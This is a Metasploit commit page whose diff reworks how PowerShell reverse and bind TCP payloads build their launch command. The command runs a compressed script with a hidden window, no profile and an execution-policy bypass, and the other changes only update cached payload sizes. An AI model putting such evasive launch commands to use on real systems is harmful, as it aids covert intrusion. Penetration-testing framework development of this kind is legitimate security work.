Skip to content

Commit 57afc3b

Browse files
committed
Land rapid7#9044, Address generation issues with pure PSH payloads
2 parents 850aeda + 37e0683 commit 57afc3b

File tree

7 files changed

+18
-7
lines changed

7 files changed

+18
-7
lines changed

lib/msf/core/payload/windows/powershell.rb

Lines changed: 12 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -44,7 +44,18 @@ def generate_powershell_code(conntype)
4444
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
4545

4646
script = Rex::Powershell::Command.compress_script(script_in)
47-
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
47+
command_args = {
48+
noprofile: true,
49+
windowstyle: 'hidden',
50+
noninteractive: true,
51+
executionpolicy: 'bypass'
52+
}
53+
cli = Rex::Powershell::Command.generate_psh_command_line(command_args)
54+
return "#{cli} \"#{script}\""
55+
end
56+
57+
def generate
58+
command_string
4859
end
4960
end
5061
end

modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@
1010

1111
module MetasploitModule
1212

13-
CachedSize = 1518
13+
CachedSize = 1501
1414

1515
include Msf::Payload::Single
1616
include Rex::Powershell::Command

modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@
1010

1111
module MetasploitModule
1212

13-
CachedSize = 1526
13+
CachedSize = 1509
1414

1515
include Msf::Payload::Single
1616
include Rex::Powershell::Command

modules/payloads/singles/windows/powershell_bind_tcp.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@
1515
###
1616
module MetasploitModule
1717

18-
CachedSize = 1703
18+
CachedSize = 1501
1919

2020
include Msf::Payload::Windows::Exec
2121
include Rex::Powershell::Command

modules/payloads/singles/windows/powershell_reverse_tcp.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@
1515
###
1616
module MetasploitModule
1717

18-
CachedSize = 1711
18+
CachedSize = 1509
1919

2020
include Msf::Payload::Windows::Exec
2121
include Msf::Payload::Windows::Powershell

modules/payloads/singles/windows/x64/powershell_bind_tcp.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@
1515
###
1616
module MetasploitModule
1717

18-
CachedSize = 1786
18+
CachedSize = 1501
1919

2020
include Msf::Payload::Windows::Exec_x64
2121
include Rex::Powershell::Command

modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@
1515
###
1616
module MetasploitModule
1717

18-
CachedSize = 1794
18+
CachedSize = 1509
1919

2020
include Msf::Payload::Windows::Exec_x64
2121
include Msf::Payload::Windows::Powershell

0 commit comments

Comments
 (0)